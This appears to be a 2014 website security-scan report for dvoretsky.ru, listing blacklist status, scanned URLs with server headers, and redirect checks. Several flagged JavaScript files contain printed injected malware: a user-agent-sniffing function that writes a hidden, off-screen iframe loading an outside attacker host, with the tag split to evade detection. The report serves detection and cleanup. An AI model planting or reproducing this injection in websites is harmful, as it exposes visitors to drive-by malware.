Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dvoretsky.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dvoretsky.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://dvoretsky.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:23 GMT Location: http://www.dvoretsky.ru/ Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=6rs9d8rkucc7t37it496q9de95; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/ | 200 OK Content-Length: 37742 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=617f2f08dcba3349ccbd30375bdf2037&type=js | 200 OK Content-Length: 41380 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode(){var por=navigator.userAgent;var ha=(por.indexOf("IEMobile")>-1||por.indexOf("Android")>-1||por.indexOf("Linux")>-1||por.indexOf("FreeBSD")>-1||por.indexOf("Chrome")>-1||por.indexOf("Macintosh")>-1||por.indexOf("iPad")>-1||por.indexOf("iPhone")>-1);if(!ha){document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: -799px;" height="120" width="120"></iframe>');}} Sebastiancode();try{$(document).ready(function(){$("div.content-menu ul li").each(function(){$(this).mouseover(function(){$(this).addClass('active').addClass('rc5');return false;});$(this).mouseout(function(){$(this).removeClass('active').removeClass("rc5");});});});}catch(e){};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://dvoretsky.ru/zakonodatelstvo/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:28 GMT Location: http://www.dvoretsky.ru/zakonodatelstvo/ Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=nc11g96ks7dpj8g6se6bh42n91; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/zakonodatelstvo/ | 200 OK Content-Length: 19353 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=5847273bd7365ce0ab09ddc027a2397a&type=js | 200 OK Content-Length: 33427 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode(){var por=navigator.userAgent;var ha=(por.indexOf("IEMobile")>-1||por.indexOf("Android")>-1||por.indexOf("Linux")>-1||por.indexOf("FreeBSD")>-1||por.indexOf("Chrome")>-1||por.indexOf("Macintosh")>-1||por.indexOf("iPad")>-1||por.indexOf("iPhone")>-1);if(!ha){document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: -799px;" height="120" width="120"></iframe>');}} Sebastiancode();try{$(document).ready(function(){$("div.content-menu ul li").each(function(){$(this).mouseover(function(){$(this).addClass('active').addClass('rc5');return false;});$(this).mouseout(function(){$(this).removeClass('active').removeClass("rc5");});});});}catch(e){};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://dvoretsky.ru/knizhnyy-magazin.html | 200 OK Content-Length: 22791 Content-Type: text/html | clean |
http://www.dvoretsky.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 59703 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode() {
var por = navigator.userAgent; var ha = (por.indexOf("IEMobile") > -1 || por.indexOf("Android") > -1 || por.indexOf("Linux") > -1 || por.indexOf("FreeBSD") > -1 || por.indexOf("Chrome") > -1 || por.indexOf("Macintosh") > -1 || por.indexOf("iPad") > -1 || por.indexOf("iPhone") > -1); if (!ha) { document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: - new Fx.Style(this.container, 'opacity', { duration:250, onComplete: function() { window.removeEvent('scroll', this.eventPosition).removeEvent('resize', this.eventPosition); if (this.options.overlay) { this.overlay.remove(); } try{ this.container.remove(); } catch(e){} }.bind(this) }).custom(1, 0); } }); MooPrompt.implement(new Chain);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=4acecd4f57983ded15c1d1c47cf24480&type=js&gz=gz | 500 Internal Server Error Content-Length: 412 Content-Type: text/javascript | clean |
http://www.dvoretsky.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 37485 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode() {
var por = navigator.userAgent; var ha = (por.indexOf("IEMobile") > -1 || por.indexOf("Android") > -1 || por.indexOf("Linux") > -1 || por.indexOf("FreeBSD") > -1 || por.indexOf("Chrome") > -1 || por.indexOf("Macintosh") > -1 || por.indexOf("iPad") > -1 || por.indexOf("iPhone") > -1); if (!ha) { document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: - { var b = false; for(var i = tt_aExt.length; i;) {--i; var fnc = tt_aExt[i]["On" + sFnc]; if(fnc && fnc(arg)) b = true; } return b; } if (window.addEventListener) { window.addEventListener("load", tt_Init, false); } else if (window.attachEvent) { window.attachEvent("onload", tt_Init); } else if (document.getElementById) { window.onload=tt_Init; } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://dvoretsky.ru/frontpage/company-catalog.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:31 GMT Location: http://www.dvoretsky.ru/frontpage/company-catalog.html Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=2iqdguct0ov6vtfpadb7l67re3; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/frontpage/company-catalog.html | 200 OK Content-Length: 32012 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=48230afac1ad1990696313d08c16e816&type=js | 200 OK Content-Length: 10360 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode(){var por=navigator.userAgent;var ha=(por.indexOf("IEMobile")>-1||por.indexOf("Android")>-1||por.indexOf("Linux")>-1||por.indexOf("FreeBSD")>-1||por.indexOf("Chrome")>-1||por.indexOf("Macintosh")>-1||por.indexOf("iPad")>-1||por.indexOf("iPhone")>-1);if(!ha){document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: -799px;" height="120" width="120"></iframe>');}} Sebastiancode();try{$(document).ready(function(){$("div.content-menu ul li").each(function(){$(this).mouseover(function(){$(this).addClass('active').addClass('rc5');return false;});$(this).mouseout(function(){$(this).removeClass('active').removeClass("rc5");});});});}catch(e){};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://dvoretsky.ru/lost-password.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:34 GMT Location: http://www.dvoretsky.ru/lost-password.html Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=0d36uebdj5e0asa2vekoqateo6; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/lost-password.html | 200 OK Content-Length: 15220 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=e798c2ae3977c9b31a898f1f744a28ce&type=js | 500 Internal Server Error Content-Length: 4088 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Sebastiancode(){var por=navigator.userAgent;var ha=(por.indexOf("IEMobile")>-1||por.indexOf("Android")>-1||por.indexOf("Linux")>-1||por.indexOf("FreeBSD")>-1||por.indexOf("Chrome")>-1||por.indexOf("Macintosh")>-1||por.indexOf("iPad")>-1||por.indexOf("iPhone")>-1);if(!ha){document.write('<if'+'rame src="http://liskametas.tomogara.org/safegajeta15.html" style="posit'+'ion:absolute;left: -799px;top: -799px;" height="120" width="120"></iframe>');}} Sebastiancode();try{$(document).ready(function(){$("div.content-menu ul li").each(function(){$(this).mouseover(function(){$(this).addClass('active').addClass('rc5');return false;});$(this).mouseout(function(){$(this).removeClass('active').removeClass("rc5");});});});}catch(e){};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://dvoretsky.ru/novosti-kompaniy/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 11:13:35 GMT Location: http://www.dvoretsky.ru/novosti-kompaniy/ Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 79a43b00f2609251659995a1f763eb97=cke86utqrqkqhtb7n4at69p6r3; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.dvoretsky.ru/novosti-kompaniy/ | 200 OK Content-Length: 32085 Content-Type: text/html | clean |
http://www.dvoretsky.ru/knizhnyy-magazin.html | 200 OK Content-Length: 22791 Content-Type: text/html | clean |
http://www.dvoretsky.ru/plugins/system/JCH_Optimize/jscss.php?f=4acecd4f57983ded15c1d1c47cf24480&type=js&gz=gz | 500 Internal Server Error Content-Length: 412 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dvoretsky.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 11:13:23 GMT
Location: http://www.dvoretsky.ru/
Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2
Content-Length: 0
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 79a43b00f2609251659995a1f763eb97=6rs9d8rkucc7t37it496q9de95; path=/
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: dvoretsky.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 11:13:23 GMT
Location: http://www.dvoretsky.ru/
Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2
Content-Length: 0
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 79a43b00f2609251659995a1f763eb97=6rs9d8rkucc7t37it496q9de95; path=/
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dvoretsky.ru
Referer: http://www.google.com/search?q=dvoretsky.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dvoretsky.ru
Referer: http://www.google.com/search?q=dvoretsky.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.